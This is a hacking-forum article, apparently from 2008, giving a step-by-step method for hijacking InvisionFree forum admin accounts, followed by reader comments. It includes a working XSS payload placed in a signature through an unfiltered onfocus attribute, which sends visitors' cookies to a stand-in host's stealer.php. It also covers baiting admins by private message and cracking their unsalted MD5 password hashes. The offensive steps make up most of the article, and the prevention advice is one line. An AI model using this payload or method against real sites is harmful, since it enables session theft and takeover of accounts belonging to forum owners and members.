Follow us on Twitter!
You cannot teach a man anything; you can only help him find it within himself. - Galileo
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 19
Guests Online: 18
Members Online: 1

Registered Members: 82889
Newest Member: Geriztul
Latest Articles

Hacking InvisionFree forums

Arrow Image Ever wanted to hack that InvisionFree forum that you despise? Or maybe you're the ethical hacker that simply wants to show InvisionFree owners how to stay secure (through demonstration, no less). Either way, you might find this guide useful.



Ever wanted to hack that InvisionFree forum that you despise? Or maybe you\'re the ethical hacker that simply wants to show InvisionFree owners how to stay secure (through demonstration, no less). Either way, you might find this guide useful.

Requirements:
- Basic HTML knowledge
- Advanced-ish PHP knowledge
- Advanced-ish Javascript knowledge
- An inconspicuous image
- A PHP host
- An (active) Invisionfree forum to hack
- Proxy/proxies (optional, but recommended)
- Possibly social engineering skills

That\'s a long list of requirements, but I\'m sure most of you have these things.

STEP ONE: THE COOKIE STEALER
You need to write a cookie stealer. Preferrably, the cookie stealer should show itself as an image so you don\'t have to redirect your victims to it (ensuring a quickly blown cover). I\'m not going to tell you how to write one, mainly because you have an unlimited amount of information at your fingertips, hiding under the name \"Google\". Just have there be a GET variable containing the cookie and then store it in a text file or a MySQL database. If you choose the latter, remember to include a file that gets the cookies from the database and also guard against SQL injections.

STEP TWO: IMPLEMENTATION
It\'s time to implement your cookie stealer. You will need the forum to have HTML in signatures. If you already have HTML in the signatures, skip to the next paragraph. If you\'re unlucky enough not to, you\'re going to have to convince the admin of the forum to enable HTML in signatures. For instance, say you have a killer Flash signature that you just HAVE to include.

Include the cookie stealer\'s image in an img tag. Give it a unique id like \"snarfblat\" or \"cacklemuffs\" so you can edit the image source with Javascript.

InvisionFree doesn\'t filter out \"onFocus\", which is great for us. Add a body tag with the onFocus attribute that changes snarfblat/cacklemuffs\' src. It would appear something like:

<body onfocus=\"document.getElementById(\'snarfblat\').setAttribute(\'src\', \'http://www.example.com/stealer.php?cookie=\'+document.cookie);\"></body>
<img src=\"http://www.example.com/image.jpg\" id=\"snarfblat\">

Submit and try it out. If it works, congratulations! Move to step three. If it doesn\'t, you might have done something wrong.

STEP THREE: GETTING THE COOKIES
Post. If you feel like you\'re not getting good enough cookies fast enough (you want access to the ACP), PM the admins.

STEP FOUR: WHAT NOW?
Crack the admin passwords. They\'re unsalted. If you somehow don\'t know how to distinguish between admin and member, find the member ID\'s of the admins. Then find those ID\'s in your cookies (e.g. [forumname]member_id=1), locate the pass_hash of the cookies, and start cracking the MD5\'s.

Once you have the admin passwords, log in as the admins and do whatever you want.

PREVENTION
To prevent this from happening, filter out the attribute \"onFocus\" loosely. If you\'re extremely paranoid, disable HTML in signatures altogether.

DISCLAIMER
You are responsible for your own actions.

Comments

spywareon July 30 2008 - 02:25:39
All I have to add to your little speech, moshbat, is the sound of my hands clapping together, creating the sound of yet another vote, cast to 'poor'. Clap clap, mosh, clap clap.
korgon July 31 2008 - 09:03:14
Not even going to comment. Just clap,clap here too spy. @moshbat burn it don't delete it.
mutantsruson July 31 2008 - 21:05:59
well despite the fact that the article is 99% useless.. I did get one good thing out of it... I didn't know InvisionFree was vulnerable to XSS via onfocus. Hmmm... cooks up a fun CSRF exploit in his head. Hmmm.. maybe Ill go check out some boards later. Pfft
skathgh420on August 03 2008 - 06:21:11
Two thumbs down
Uber0non August 09 2008 - 14:26:19
This should be rewritten a bit and posted as a PoC at some full-disclosure vulnerability archive, not as a HBH article Pfft
Uber0non August 13 2008 - 19:06:31
PS. Fritzo says he's sorry for me being so nice to you. Let me clarify my point; this is not a good article. Happy now, Fritzo? Wink
Zephyr_Pureon August 25 2008 - 07:48:10
... Someone that didn't comment. I agree with Uberon: the article didn't teach anything. It only demonstrated.
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.